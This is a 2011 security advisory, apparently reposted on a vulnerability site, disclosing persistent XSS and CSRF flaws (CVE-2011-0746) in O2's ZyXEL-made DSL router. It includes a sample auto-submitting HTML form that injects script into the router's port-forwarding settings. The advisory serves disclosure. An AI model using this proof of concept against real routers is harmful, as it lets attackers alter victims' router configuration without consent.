O2 classic router: persistent cross site scripting (XSS) and cross site request forgery (CSRF)

2011.04.14
Credit: Hanno Boeck
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2011-0746
CWE: CWE-352


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

O2 classic router: persistent cross site scripting (XSS) and cross site request forgery (CSRF) References http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1482 http://int21.de/cve/CVE-2011-0746-o2-router.html Description The default DSL router shipped by the german company O2 is completely vulnerable to persistent cross site scripting (XSS) and cross site request forgery (CSRF). The device is produced by ZyXEL, it seems it has no other name than the brand "O2 DSL Router Classic". As an example, the form at /Forms/PortForwarding_Edit_1 accepts javascript code for the parameter PortRule_Name, which will be permanently stored. Also, the form has no protection against CSRF. A sample code that will inject permanent javascript when called by a user who is logged into his router: <form id="form1" method="post" action="http://192.168.1.1/Forms/PortForwarding_Edit_1"> <input name="PortRule_Name" value='"><script>alert(7)</script>'> <input name="PortRule_SPort" value="77"> <input name="PortRule_EPort" value="77"> <input name="PortRule_SrvAddr" value="10.0.0.1" > <script> var frm = document.getElementById("form1"); frm.submit(); </script> This is just an example, all forms in the router interface are vulnerable to CSRF and, if they accept text input, to XSS. The vulnerability has been disclosed to O2 in advance without any reply. Disclosure Timeline 2011-02-03: Vendor contacted 2011-04-07: Published advisory This vulnerability was discovered by Hanno Boeck, http://www.hboeck.de, of schokokeks.org webhosting. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.17 (GNU/Linux) iQIcBAEBCAAGBQJNnfb6AAoJEKWIAHK7tR5CRUQP/RisVg6f0fntQIMgLuyqL6zZ JXb79qiti1ac63s2RtN05ls8tlTOi6ixIzchtogXvJiBh4xoN+iaQeOAYSZHe9VQ 97kvnfRlZHE3pt168R+/vdThkhgtenzqLorUENZFpODuRii5lPfQZPIaB+yeSZo/ x5SWVnONgB3KkBuUQokTBogRT1t2D5+gu9+mk/aJAWt8ww7YPCalb7bwetBKDVZs O2tVcvWswgm2DhHW5D7aXWAEvuczdmZhhqGz/bMF2Kt7VwqZvvhkar2O1voCZUlg wcDzueMakjoSWHipQgGdMYVKiuMAfWXGmjl1Y++3ODnj7yCHLl70+cYbetZJnSjp fQbz/Vv6t/RnINR6ncRHx1wuIRVCO72qL+rfhn4jwuriHlL85wCfbaVzzgyoAcmz LXlfgIJzH2qohQ2ujFGAclNVSNXcarsaSaPoiR0j0+XbnYTTHWVyZPleicp8h31W w9fUbb28PVyj26vcfWOPRp0kwcevCh4NcjyyNqTFJp+j5802AasTZRxNJ6ywWQHn tHinbYFoGm12EDB1Qdyp76iCs7zl4s30vQClfW9IDGdf3bPkaer2UGeSamjlUfN0 M1KnFt8yyQtsyXGIdRkP2voOg6OkCQ+s5OQdVrdUpLiOEbSJceoNj4jUjBhxNBTy CEivgW6vyIGPcyOB1sPY =jk2K -----END PGP SIGNATURE-----

References:

http://www.securityfocus.com/archive/1/archive/1/517399/100/0/threaded
http://int21.de/cve/CVE-2011-0746-o2-router.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top